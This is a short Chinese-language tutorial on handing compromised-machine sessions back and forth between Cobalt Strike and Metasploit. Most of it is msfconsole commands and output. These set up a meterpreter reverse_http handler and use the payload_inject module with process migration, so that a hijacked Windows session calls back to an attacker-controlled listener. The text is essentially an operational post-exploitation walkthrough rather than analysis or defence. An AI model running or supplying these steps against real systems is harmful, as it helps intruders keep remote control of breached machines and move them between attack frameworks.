CS —> MSF
首先cs上創建一個http的外部監聽器。
此時在CS服務端查看監聽的ip,發現并沒有開啟,需要到成功移交會話后才會啟動。
netstat -tunlp | grep 7000
在MSF中使用handler模塊,配置監聽。
注意:目標機器的地址是rhost,本地機器的地址是lhost。
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set lhost 192.168.0.128
lhost => 192.168.0.128
msf6 exploit(multi/handler) > set lport 7000
lport => 7000
msf6 exploit(multi/handler) > run[*] Started HTTP reverse handler on http://192.168.0.128:7000
此時在對應的想進行移交的交互會話內執行下面命令即可成功移交。
MSF成功監聽到會話。
此時再次查看監聽器所配置的端口,即可看到已經啟動。
netstat -tunlp | grep 7000
MSF —> CS
首先在CS內創建監聽器。
?將session放在后臺,然后配置payloads_inject模塊。
background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http # 和CS的監聽器要一致
set lhost 192.168.0.128 ? # CS服務端IP
set lport 6669 ? ? ? # CS客戶端配置的監聽器的端口號
set DisablePayloadHandler True #禁用MSF自動啟動payload handler,因為要用在CS內手動啟動的handler。
set PrependMigrate True #在payload執行前自動遷移到另一個進程,以提高穩定性。
set session 2 ?# 會話id
run
此時可以看到CS內成功監聽到了會話。